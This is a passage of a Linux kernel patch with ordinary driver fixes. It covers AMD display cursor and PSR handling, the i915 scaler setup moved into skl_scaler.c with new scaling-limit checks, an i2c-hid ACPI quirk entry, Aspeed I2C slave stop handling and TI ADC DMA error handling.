++	if (new_plane_state->rotation != DRM_MODE_ROTATE_0)
++		goto ffu;
++
+ 	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
+ 	clips = drm_plane_get_damage_clips(new_plane_state);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+index 848db8676adfd..46c2b991aa108 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+@@ -465,6 +465,7 @@ struct dc_cursor_mi_param {
+ 	struct fixed31_32 v_scale_ratio;
+ 	enum dc_rotation_angle rotation;
+ 	bool mirror;
++	struct dc_stream_state *stream;
+ };
+ 
+ /* IPP related types */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index d84579da64003..009b5861a3fec 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3427,7 +3427,8 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 		.h_scale_ratio = pipe_ctx->plane_res.scl_data.ratios.horz,
+ 		.v_scale_ratio = pipe_ctx->plane_res.scl_data.ratios.vert,
+ 		.rotation = pipe_ctx->plane_state->rotation,
+-		.mirror = pipe_ctx->plane_state->horizontal_mirror
++		.mirror = pipe_ctx->plane_state->horizontal_mirror,
++		.stream = pipe_ctx->stream,
+ 	};
+ 	bool pipe_split_on = false;
+ 	bool odm_combine_on = (pipe_ctx->next_odm_pipe != NULL) ||
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
+index 4566bc7abf17e..aa252dc263267 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
+@@ -1075,8 +1075,16 @@ void hubp2_cursor_set_position(
+ 	if (src_y_offset < 0)
+ 		src_y_offset = 0;
+ 	/* Save necessary cursor info x, y position. w, h is saved in attribute func. */
+-	hubp->cur_rect.x = src_x_offset + param->viewport.x;
+-	hubp->cur_rect.y = src_y_offset + param->viewport.y;
++	if (param->stream->link->psr_settings.psr_version >= DC_PSR_VERSION_SU_1 &&
++	    param->rotation != ROTATION_ANGLE_0) {
++		hubp->cur_rect.x = 0;
++		hubp->cur_rect.y = 0;
++		hubp->cur_rect.w = param->stream->timing.h_addressable;
++		hubp->cur_rect.h = param->stream->timing.v_addressable;
++	} else {
++		hubp->cur_rect.x = src_x_offset + param->viewport.x;
++		hubp->cur_rect.y = src_y_offset + param->viewport.y;
++	}
+ }
+ 
+ void hubp2_clk_cntl(struct hubp *hubp, bool enable)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 53262f6bc40b0..72bec33e371f3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -994,5 +994,8 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
++
++	dc_dmub_srv_p_state_delegate(dc,
++		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic.c b/drivers/gpu/drm/i915/display/intel_atomic.c
+index 18f0a5ae3bacd..a502af0b6dd47 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic.c
++++ b/drivers/gpu/drm/i915/display/intel_atomic.c
+@@ -41,6 +41,7 @@
+ #include "intel_global_state.h"
+ #include "intel_hdcp.h"
+ #include "intel_psr.h"
++#include "intel_fb.h"
+ #include "skl_universal_plane.h"
+ 
+ /**
+@@ -302,198 +303,6 @@ intel_crtc_destroy_state(struct drm_crtc *crtc,
+ 	kfree(crtc_state);
+ }
+ 
+-static void intel_atomic_setup_scaler(struct intel_crtc_scaler_state *scaler_state,
+-				      int num_scalers_need, struct intel_crtc *intel_crtc,
+-				      const char *name, int idx,
+-				      struct intel_plane_state *plane_state,
+-				      int *scaler_id)
+-{
+-	struct drm_i915_private *dev_priv = to_i915(intel_crtc->base.dev);
+-	int j;
+-	u32 mode;
+-
+-	if (*scaler_id < 0) {
+-		/* find a free scaler */
+-		for (j = 0; j < intel_crtc->num_scalers; j++) {
+-			if (scaler_state->scalers[j].in_use)
+-				continue;
+-
+-			*scaler_id = j;
+-			scaler_state->scalers[*scaler_id].in_use = 1;
+-			break;
+-		}
+-	}
+-
+-	if (drm_WARN(&dev_priv->drm, *scaler_id < 0,
+-		     "Cannot find scaler for %s:%d\n", name, idx))
+-		return;
+-
+-	/* set scaler mode */
+-	if (plane_state && plane_state->hw.fb &&
+-	    plane_state->hw.fb->format->is_yuv &&
+-	    plane_state->hw.fb->format->num_planes > 1) {
+-		struct intel_plane *plane = to_intel_plane(plane_state->uapi.plane);
+-		if (DISPLAY_VER(dev_priv) == 9) {
+-			mode = SKL_PS_SCALER_MODE_NV12;
+-		} else if (icl_is_hdr_plane(dev_priv, plane->id)) {
+-			/*
+-			 * On gen11+'s HDR planes we only use the scaler for
+-			 * scaling. They have a dedicated chroma upsampler, so
+-			 * we don't need the scaler to upsample the UV plane.
+-			 */
+-			mode = PS_SCALER_MODE_NORMAL;
+-		} else {
+-			struct intel_plane *linked =
+-				plane_state->planar_linked_plane;
+-
+-			mode = PS_SCALER_MODE_PLANAR;
+-
+-			if (linked)
+-				mode |= PS_PLANE_Y_SEL(linked->id);
+-		}
+-	} else if (DISPLAY_VER(dev_priv) >= 10) {
+-		mode = PS_SCALER_MODE_NORMAL;
+-	} else if (num_scalers_need == 1 && intel_crtc->num_scalers > 1) {
+-		/*
+-		 * when only 1 scaler is in use on a pipe with 2 scalers
+-		 * scaler 0 operates in high quality (HQ) mode.
+-		 * In this case use scaler 0 to take advantage of HQ mode
+-		 */
+-		scaler_state->scalers[*scaler_id].in_use = 0;
+-		*scaler_id = 0;
+-		scaler_state->scalers[0].in_use = 1;
+-		mode = SKL_PS_SCALER_MODE_HQ;
+-	} else {
+-		mode = SKL_PS_SCALER_MODE_DYN;
+-	}
+-
+-	drm_dbg_kms(&dev_priv->drm, "Attached scaler id %u.%u to %s:%d\n",
+-		    intel_crtc->pipe, *scaler_id, name, idx);
+-	scaler_state->scalers[*scaler_id].mode = mode;
+-}
+-
+-/**
+- * intel_atomic_setup_scalers() - setup scalers for crtc per staged requests
+- * @dev_priv: i915 device
+- * @intel_crtc: intel crtc
+- * @crtc_state: incoming crtc_state to validate and setup scalers
+- *
+- * This function sets up scalers based on staged scaling requests for
+- * a @crtc and its planes. It is called from crtc level check path. If request
+- * is a supportable request, it attaches scalers to requested planes and crtc.
+- *
+- * This function takes into account the current scaler(s) in use by any planes
+- * not being part of this atomic state
+- *
+- *  Returns:
+- *         0 - scalers were setup succesfully
+- *         error code - otherwise
+- */
+-int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
+-			       struct intel_crtc *intel_crtc,
+-			       struct intel_crtc_state *crtc_state)
+-{
+-	struct drm_plane *plane = NULL;
+-	struct intel_plane *intel_plane;
+-	struct intel_plane_state *plane_state = NULL;
+-	struct intel_crtc_scaler_state *scaler_state =
+-		&crtc_state->scaler_state;
+-	struct drm_atomic_state *drm_state = crtc_state->uapi.state;
+-	struct intel_atomic_state *intel_state = to_intel_atomic_state(drm_state);
+-	int num_scalers_need;
+-	int i;
+-
+-	num_scalers_need = hweight32(scaler_state->scaler_users);
+-
+-	/*
+-	 * High level flow:
+-	 * - staged scaler requests are already in scaler_state->scaler_users
+-	 * - check whether staged scaling requests can be supported
+-	 * - add planes using scalers that aren't in current transaction
+-	 * - assign scalers to requested users
+-	 * - as part of plane commit, scalers will be committed
+-	 *   (i.e., either attached or detached) to respective planes in hw
+-	 * - as part of crtc_commit, scaler will be either attached or detached
+-	 *   to crtc in hw
+-	 */
+-
+-	/* fail if required scalers > available scalers */
+-	if (num_scalers_need > intel_crtc->num_scalers){
+-		drm_dbg_kms(&dev_priv->drm,
+-			    "Too many scaling requests %d > %d\n",
+-			    num_scalers_need, intel_crtc->num_scalers);
+-		return -EINVAL;
+-	}
+-
+-	/* walkthrough scaler_users bits and start assigning scalers */
+-	for (i = 0; i < sizeof(scaler_state->scaler_users) * 8; i++) {
+-		int *scaler_id;
+-		const char *name;
+-		int idx;
+-
+-		/* skip if scaler not required */
+-		if (!(scaler_state->scaler_users & (1 << i)))
+-			continue;
+-
+-		if (i == SKL_CRTC_INDEX) {
+-			name = "CRTC";
+-			idx = intel_crtc->base.base.id;
+-
+-			/* panel fitter case: assign as a crtc scaler */
+-			scaler_id = &scaler_state->scaler_id;
+-		} else {
+-			name = "PLANE";
+-
+-			/* plane scaler case: assign as a plane scaler */
+-			/* find the plane that set the bit as scaler_user */
+-			plane = drm_state->planes[i].ptr;
+-
+-			/*
+-			 * to enable/disable hq mode, add planes that are using scaler
+-			 * into this transaction
+-			 */
+-			if (!plane) {
+-				struct drm_plane_state *state;
+-
+-				/*
+-				 * GLK+ scalers don't have a HQ mode so it
+-				 * isn't necessary to change between HQ and dyn mode
+-				 * on those platforms.
+-				 */
+-				if (DISPLAY_VER(dev_priv) >= 10)
+-					continue;
+-
+-				plane = drm_plane_from_index(&dev_priv->drm, i);
+-				state = drm_atomic_get_plane_state(drm_state, plane);
+-				if (IS_ERR(state)) {
+-					drm_dbg_kms(&dev_priv->drm,
+-						    "Failed to add [PLANE:%d] to drm_state\n",
+-						    plane->base.id);
+-					return PTR_ERR(state);
+-				}
+-			}
+-
+-			intel_plane = to_intel_plane(plane);
+-			idx = plane->base.id;
+-
+-			/* plane on different crtc cannot be a scaler user of this crtc */
+-			if (drm_WARN_ON(&dev_priv->drm,
+-					intel_plane->pipe != intel_crtc->pipe))
+-				continue;
+-
+-			plane_state = intel_atomic_get_new_plane_state(intel_state,
+-								       intel_plane);
+-			scaler_id = &plane_state->scaler_id;
+-		}
+-
+-		intel_atomic_setup_scaler(scaler_state, num_scalers_need,
+-					  intel_crtc, name, idx,
+-					  plane_state, scaler_id);
+-	}
+-
+-	return 0;
+-}
+-
+ struct drm_atomic_state *
+ intel_atomic_state_alloc(struct drm_device *dev)
+ {
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic.h b/drivers/gpu/drm/i915/display/intel_atomic.h
+index 1dc439983dd94..e506f6a873447 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic.h
++++ b/drivers/gpu/drm/i915/display/intel_atomic.h
+@@ -52,8 +52,4 @@ struct intel_crtc_state *
+ intel_atomic_get_crtc_state(struct drm_atomic_state *state,
+ 			    struct intel_crtc *crtc);
+ 
+-int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
+-			       struct intel_crtc *intel_crtc,
+-			       struct intel_crtc_state *crtc_state);
+-
+ #endif /* __INTEL_ATOMIC_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 1777a12f2f421..fb8d1d63407a2 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -6481,6 +6481,17 @@ static int intel_async_flip_check_uapi(struct intel_atomic_state *state,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * FIXME: Bigjoiner+async flip is busted currently.
++	 * Remove this check once the issues are fixed.
++	 */
++	if (new_crtc_state->bigjoiner_pipes) {
++		drm_dbg_kms(&i915->drm,
++			    "[CRTC:%d:%s] async flip disallowed with bigjoiner\n",
++			    crtc->base.base.id, crtc->base.name);
++		return -EINVAL;
++	}
++
+ 	for_each_oldnew_intel_plane_in_state(state, plane, old_plane_state,
+ 					     new_plane_state, i) {
+ 		if (plane->pipe != crtc->pipe)
+diff --git a/drivers/gpu/drm/i915/display/intel_fb.c b/drivers/gpu/drm/i915/display/intel_fb.c
+index 23d854bd73b77..c69a638796c62 100644
+--- a/drivers/gpu/drm/i915/display/intel_fb.c
++++ b/drivers/gpu/drm/i915/display/intel_fb.c
+@@ -1176,7 +1176,8 @@ bool intel_fb_needs_pot_stride_remap(const struct intel_framebuffer *fb)
+ {
+ 	struct drm_i915_private *i915 = to_i915(fb->base.dev);
+ 
+-	return IS_ALDERLAKE_P(i915) && fb->base.modifier != DRM_FORMAT_MOD_LINEAR;
++	return (IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14) &&
++		intel_fb_uses_dpt(&fb->base);
+ }
+ 
+ static int intel_fb_pitch(const struct intel_framebuffer *fb, int color_plane, unsigned int rotation)
+@@ -1312,9 +1313,11 @@ plane_view_scanout_stride(const struct intel_framebuffer *fb, int color_plane,
+ 			  unsigned int tile_width,
+ 			  unsigned int src_stride_tiles, unsigned int dst_stride_tiles)
+ {
++	struct drm_i915_private *i915 = to_i915(fb->base.dev);
+ 	unsigned int stride_tiles;
+ 
+-	if (IS_ALDERLAKE_P(to_i915(fb->base.dev)))
++	if ((IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14) &&
++	    src_stride_tiles < dst_stride_tiles)
+ 		stride_tiles = src_stride_tiles;
+ 	else
+ 		stride_tiles = dst_stride_tiles;
+@@ -1520,7 +1523,8 @@ static void intel_fb_view_init(struct drm_i915_private *i915, struct intel_fb_vi
+ 	memset(view, 0, sizeof(*view));
+ 	view->gtt.type = view_type;
+ 
+-	if (view_type == I915_GTT_VIEW_REMAPPED && IS_ALDERLAKE_P(i915))
++	if (view_type == I915_GTT_VIEW_REMAPPED &&
++	    (IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14))
+ 		view->gtt.remapped.plane_alignment = SZ_2M / PAGE_SIZE;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index 90f42f63128ec..0b74f91e865d0 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -337,6 +337,263 @@ int skl_update_scaler_plane(struct intel_crtc_state *crtc_state,
+ 	return 0;
+ }
+ 
++static int intel_atomic_setup_scaler(struct intel_crtc_scaler_state *scaler_state,
++				     int num_scalers_need, struct intel_crtc *intel_crtc,
++				     const char *name, int idx,
++				     struct intel_plane_state *plane_state,
++				     int *scaler_id)
++{
++	struct drm_i915_private *dev_priv = to_i915(intel_crtc->base.dev);
++	int j;
++	u32 mode;
++
++	if (*scaler_id < 0) {
++		/* find a free scaler */
++		for (j = 0; j < intel_crtc->num_scalers; j++) {
++			if (scaler_state->scalers[j].in_use)
++				continue;
++
++			*scaler_id = j;
++			scaler_state->scalers[*scaler_id].in_use = 1;
++			break;
++		}
++	}
++
++	if (drm_WARN(&dev_priv->drm, *scaler_id < 0,
++		     "Cannot find scaler for %s:%d\n", name, idx))
++		return -EINVAL;
++
++	/* set scaler mode */
++	if (plane_state && plane_state->hw.fb &&
++	    plane_state->hw.fb->format->is_yuv &&
++	    plane_state->hw.fb->format->num_planes > 1) {
++		struct intel_plane *plane = to_intel_plane(plane_state->uapi.plane);
++
++		if (DISPLAY_VER(dev_priv) == 9) {
++			mode = SKL_PS_SCALER_MODE_NV12;
++		} else if (icl_is_hdr_plane(dev_priv, plane->id)) {
++			/*
++			 * On gen11+'s HDR planes we only use the scaler for
++			 * scaling. They have a dedicated chroma upsampler, so
++			 * we don't need the scaler to upsample the UV plane.
++			 */
++			mode = PS_SCALER_MODE_NORMAL;
++		} else {
++			struct intel_plane *linked =
++				plane_state->planar_linked_plane;
++
++			mode = PS_SCALER_MODE_PLANAR;
++
++			if (linked)
++				mode |= PS_PLANE_Y_SEL(linked->id);
++		}
++	} else if (DISPLAY_VER(dev_priv) >= 10) {
++		mode = PS_SCALER_MODE_NORMAL;
++	} else if (num_scalers_need == 1 && intel_crtc->num_scalers > 1) {
++		/*
++		 * when only 1 scaler is in use on a pipe with 2 scalers
++		 * scaler 0 operates in high quality (HQ) mode.
++		 * In this case use scaler 0 to take advantage of HQ mode
++		 */
++		scaler_state->scalers[*scaler_id].in_use = 0;
++		*scaler_id = 0;
++		scaler_state->scalers[0].in_use = 1;
++		mode = SKL_PS_SCALER_MODE_HQ;
++	} else {
++		mode = SKL_PS_SCALER_MODE_DYN;
++	}
++
++	/*
++	 * FIXME: we should also check the scaler factors for pfit, so
++	 * this shouldn't be tied directly to planes.
++	 */
++	if (plane_state && plane_state->hw.fb) {
++		const struct drm_framebuffer *fb = plane_state->hw.fb;
++		const struct drm_rect *src = &plane_state->uapi.src;
++		const struct drm_rect *dst = &plane_state->uapi.dst;
++		int hscale, vscale, max_vscale, max_hscale;
++
++		/*
++		 * FIXME: When two scalers are needed, but only one of
++		 * them needs to downscale, we should make sure that
++		 * the one that needs downscaling support is assigned
++		 * as the first scaler, so we don't reject downscaling
++		 * unnecessarily.
++		 */
++
++		if (DISPLAY_VER(dev_priv) >= 14) {
++			/*
++			 * On versions 14 and up, only the first
++			 * scaler supports a vertical scaling factor
++			 * of more than 1.0, while a horizontal
++			 * scaling factor of 3.0 is supported.
++			 */
++			max_hscale = 0x30000 - 1;
++			if (*scaler_id == 0)
++				max_vscale = 0x30000 - 1;
++			else
++				max_vscale = 0x10000;
++
++		} else if (DISPLAY_VER(dev_priv) >= 10 ||
++			   !intel_format_info_is_yuv_semiplanar(fb->format, fb->modifier)) {
++			max_hscale = 0x30000 - 1;
++			max_vscale = 0x30000 - 1;
++		} else {
++			max_hscale = 0x20000 - 1;
++			max_vscale = 0x20000 - 1;
++		}
++
++		/*
++		 * FIXME: We should change the if-else block above to
++		 * support HQ vs dynamic scaler properly.
++		 */
++
++		/* Check if required scaling is within limits */
++		hscale = drm_rect_calc_hscale(src, dst, 1, max_hscale);
++		vscale = drm_rect_calc_vscale(src, dst, 1, max_vscale);
++
++		if (hscale < 0 || vscale < 0) {
++			drm_dbg_kms(&dev_priv->drm,
++				    "Scaler %d doesn't support required plane scaling\n",
++				    *scaler_id);
++			drm_rect_debug_print("src: ", src, true);
++			drm_rect_debug_print("dst: ", dst, false);
++
++			return -EINVAL;
++		}
++	}
++
++	drm_dbg_kms(&dev_priv->drm, "Attached scaler id %u.%u to %s:%d\n",
++		    intel_crtc->pipe, *scaler_id, name, idx);
++	scaler_state->scalers[*scaler_id].mode = mode;
++
++	return 0;
++}
++
++/**
++ * intel_atomic_setup_scalers() - setup scalers for crtc per staged requests
++ * @dev_priv: i915 device
++ * @intel_crtc: intel crtc
++ * @crtc_state: incoming crtc_state to validate and setup scalers
++ *
++ * This function sets up scalers based on staged scaling requests for
++ * a @crtc and its planes. It is called from crtc level check path. If request
++ * is a supportable request, it attaches scalers to requested planes and crtc.
++ *
++ * This function takes into account the current scaler(s) in use by any planes
++ * not being part of this atomic state
++ *
++ *  Returns:
++ *         0 - scalers were setup successfully
++ *         error code - otherwise
++ */
++int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
++			       struct intel_crtc *intel_crtc,
++			       struct intel_crtc_state *crtc_state)
++{
++	struct drm_plane *plane = NULL;
++	struct intel_plane *intel_plane;
++	struct intel_crtc_scaler_state *scaler_state =
++		&crtc_state->scaler_state;
++	struct drm_atomic_state *drm_state = crtc_state->uapi.state;
++	struct intel_atomic_state *intel_state = to_intel_atomic_state(drm_state);
++	int num_scalers_need;
++	int i;
++
++	num_scalers_need = hweight32(scaler_state->scaler_users);
++
++	/*
++	 * High level flow:
++	 * - staged scaler requests are already in scaler_state->scaler_users
++	 * - check whether staged scaling requests can be supported
++	 * - add planes using scalers that aren't in current transaction
++	 * - assign scalers to requested users
++	 * - as part of plane commit, scalers will be committed
++	 *   (i.e., either attached or detached) to respective planes in hw
++	 * - as part of crtc_commit, scaler will be either attached or detached
++	 *   to crtc in hw
++	 */
++
++	/* fail if required scalers > available scalers */
++	if (num_scalers_need > intel_crtc->num_scalers) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "Too many scaling requests %d > %d\n",
++			    num_scalers_need, intel_crtc->num_scalers);
++		return -EINVAL;
++	}
++
++	/* walkthrough scaler_users bits and start assigning scalers */
++	for (i = 0; i < sizeof(scaler_state->scaler_users) * 8; i++) {
++		struct intel_plane_state *plane_state = NULL;
++		int *scaler_id;
++		const char *name;
++		int idx, ret;
++
++		/* skip if scaler not required */
++		if (!(scaler_state->scaler_users & (1 << i)))
++			continue;
++
++		if (i == SKL_CRTC_INDEX) {
++			name = "CRTC";
++			idx = intel_crtc->base.base.id;
++
++			/* panel fitter case: assign as a crtc scaler */
++			scaler_id = &scaler_state->scaler_id;
++		} else {
++			name = "PLANE";
++
++			/* plane scaler case: assign as a plane scaler */
++			/* find the plane that set the bit as scaler_user */
++			plane = drm_state->planes[i].ptr;
++
++			/*
++			 * to enable/disable hq mode, add planes that are using scaler
++			 * into this transaction
++			 */
++			if (!plane) {
++				struct drm_plane_state *state;
++
++				/*
++				 * GLK+ scalers don't have a HQ mode so it
++				 * isn't necessary to change between HQ and dyn mode
++				 * on those platforms.
++				 */
++				if (DISPLAY_VER(dev_priv) >= 10)
++					continue;
++
++				plane = drm_plane_from_index(&dev_priv->drm, i);
++				state = drm_atomic_get_plane_state(drm_state, plane);
++				if (IS_ERR(state)) {
++					drm_dbg_kms(&dev_priv->drm,
++						    "Failed to add [PLANE:%d] to drm_state\n",
++						    plane->base.id);
++					return PTR_ERR(state);
++				}
++			}
++
++			intel_plane = to_intel_plane(plane);
++			idx = plane->base.id;
++
++			/* plane on different crtc cannot be a scaler user of this crtc */
++			if (drm_WARN_ON(&dev_priv->drm,
++					intel_plane->pipe != intel_crtc->pipe))
++				continue;
++
++			plane_state = intel_atomic_get_new_plane_state(intel_state,
++								       intel_plane);
++			scaler_id = &plane_state->scaler_id;
++		}
++
++		ret = intel_atomic_setup_scaler(scaler_state, num_scalers_need,
++						intel_crtc, name, idx,
++						plane_state, scaler_id);
++		if (ret < 0)
++			return ret;
++	}
++
++	return 0;
++}
++
+ static int glk_coef_tap(int i)
+ {
+ 	return i % 7;
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.h b/drivers/gpu/drm/i915/display/skl_scaler.h
+index 0097d5d08e102..f040f6ac061f2 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.h
++++ b/drivers/gpu/drm/i915/display/skl_scaler.h
+@@ -8,17 +8,22 @@
+ #include <linux/types.h>
+ 
+ enum drm_scaling_filter;
++enum pipe;
+ struct drm_i915_private;
++struct intel_crtc;
+ struct intel_crtc_state;
+-struct intel_plane_state;
+ struct intel_plane;
+-enum pipe;
++struct intel_plane_state;
+ 
+ int skl_update_scaler_crtc(struct intel_crtc_state *crtc_state);
+ 
+ int skl_update_scaler_plane(struct intel_crtc_state *crtc_state,
+ 			    struct intel_plane_state *plane_state);
+ 
++int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
++			       struct intel_crtc *intel_crtc,
++			       struct intel_crtc_state *crtc_state);
++
+ void skl_pfit_enable(const struct intel_crtc_state *crtc_state);
+ 
+ void skl_program_plane_scaler(struct intel_plane *plane,
+@@ -26,4 +31,5 @@ void skl_program_plane_scaler(struct intel_plane *plane,
+ 			      const struct intel_plane_state *plane_state);
+ void skl_detach_scalers(const struct intel_crtc_state *crtc_state);
+ void skl_scaler_disable(const struct intel_crtc_state *old_crtc_state);
++
+ #endif
+diff --git a/drivers/hid/i2c-hid/i2c-hid-acpi.c b/drivers/hid/i2c-hid/i2c-hid-acpi.c
+index b96ae15e0ad91..6d35bb3974818 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-acpi.c
++++ b/drivers/hid/i2c-hid/i2c-hid-acpi.c
+@@ -39,8 +39,13 @@ static const struct acpi_device_id i2c_hid_acpi_blacklist[] = {
+ 	 * The CHPN0001 ACPI device, which is used to describe the Chipone
+ 	 * ICN8505 controller, has a _CID of PNP0C50 but is not HID compatible.
+ 	 */
+-	{"CHPN0001", 0 },
+-	{ },
++	{ "CHPN0001" },
++	/*
++	 * The IDEA5002 ACPI device causes high interrupt usage and spurious
++	 * wakeups from suspend.
++	 */
++	{ "IDEA5002" },
++	{ }
+ };
+ 
+ /* HID I²C Device: 3cdff6f7-4267-4555-ad05-b30a3d8938de */
+@@ -115,9 +120,9 @@ static int i2c_hid_acpi_probe(struct i2c_client *client)
+ }
+ 
+ static const struct acpi_device_id i2c_hid_acpi_match[] = {
+-	{"ACPI0C50", 0 },
+-	{"PNP0C50", 0 },
+-	{ },
++	{ "ACPI0C50" },
++	{ "PNP0C50" },
++	{ }
+ };
+ MODULE_DEVICE_TABLE(acpi, i2c_hid_acpi_match);
+ 
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index 6adf3b141316b..86daf791aa27c 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -249,18 +249,46 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 	if (!slave)
+ 		return 0;
+ 
+-	command = readl(bus->base + ASPEED_I2C_CMD_REG);
++	/*
++	 * Handle stop conditions early, prior to SLAVE_MATCH. Some masters may drive
++	 * transfers with low enough latency between the nak/stop phase of the current
++	 * command and the start/address phase of the following command that the
++	 * interrupts are coalesced by the time we process them.
++	 */
++	if (irq_status & ASPEED_I2CD_INTR_NORMAL_STOP) {
++		irq_handled |= ASPEED_I2CD_INTR_NORMAL_STOP;
++		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
++	}
++
++	if (irq_status & ASPEED_I2CD_INTR_TX_NAK &&
++	    bus->slave_state == ASPEED_I2C_SLAVE_READ_PROCESSED) {
++		irq_handled |= ASPEED_I2CD_INTR_TX_NAK;
++		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
++	}
++
++	/* Propagate any stop conditions to the slave implementation. */
++	if (bus->slave_state == ASPEED_I2C_SLAVE_STOP) {
++		i2c_slave_event(slave, I2C_SLAVE_STOP, &value);
++		bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
++	}
+ 
+-	/* Slave was requested, restart state machine. */
++	/*
++	 * Now that we've dealt with any potentially coalesced stop conditions,
++	 * address any start conditions.
++	 */
+ 	if (irq_status & ASPEED_I2CD_INTR_SLAVE_MATCH) {
+ 		irq_handled |= ASPEED_I2CD_INTR_SLAVE_MATCH;
+ 		bus->slave_state = ASPEED_I2C_SLAVE_START;
+ 	}
+ 
+-	/* Slave is not currently active, irq was for someone else. */
++	/*
++	 * If the slave has been stopped and not started then slave interrupt
++	 * handling is complete.
++	 */
+ 	if (bus->slave_state == ASPEED_I2C_SLAVE_INACTIVE)
+ 		return irq_handled;
+ 
++	command = readl(bus->base + ASPEED_I2C_CMD_REG);
+ 	dev_dbg(bus->dev, "slave irq status 0x%08x, cmd 0x%08x\n",
+ 		irq_status, command);
+ 
+@@ -279,17 +307,6 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 		irq_handled |= ASPEED_I2CD_INTR_RX_DONE;
+ 	}
+ 
+-	/* Slave was asked to stop. */
+-	if (irq_status & ASPEED_I2CD_INTR_NORMAL_STOP) {
+-		irq_handled |= ASPEED_I2CD_INTR_NORMAL_STOP;
+-		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
+-	}
+-	if (irq_status & ASPEED_I2CD_INTR_TX_NAK &&
+-	    bus->slave_state == ASPEED_I2C_SLAVE_READ_PROCESSED) {
+-		irq_handled |= ASPEED_I2CD_INTR_TX_NAK;
+-		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
+-	}
+-
+ 	switch (bus->slave_state) {
+ 	case ASPEED_I2C_SLAVE_READ_REQUESTED:
+ 		if (unlikely(irq_status & ASPEED_I2CD_INTR_TX_ACK))
+@@ -324,8 +341,7 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 		i2c_slave_event(slave, I2C_SLAVE_WRITE_RECEIVED, &value);
+ 		break;
+ 	case ASPEED_I2C_SLAVE_STOP:
+-		i2c_slave_event(slave, I2C_SLAVE_STOP, &value);
+-		bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
++		/* Stop event handling is done early. Unreachable. */
+ 		break;
+ 	case ASPEED_I2C_SLAVE_START:
+ 		/* Slave was just started. Waiting for the next event. */;
+diff --git a/drivers/iio/adc/ti_am335x_adc.c b/drivers/iio/adc/ti_am335x_adc.c
+index 642c5c4895e37..3ac253a27dd97 100644
+--- a/drivers/iio/adc/ti_am335x_adc.c
++++ b/drivers/iio/adc/ti_am335x_adc.c
+@@ -671,8 +671,10 @@ static int tiadc_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, indio_dev);
+ 
+ 	err = tiadc_request_dma(pdev, adc_dev);
+-	if (err && err == -EPROBE_DEFER)
++	if (err && err != -ENODEV) {
++		dev_err_probe(&pdev->dev, err, "DMA request failed\n");
+ 		goto err_dma;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/iio/buffer/industrialio-triggered-buffer.c b/drivers/iio/buffer/industrialio-triggered-buffer.c
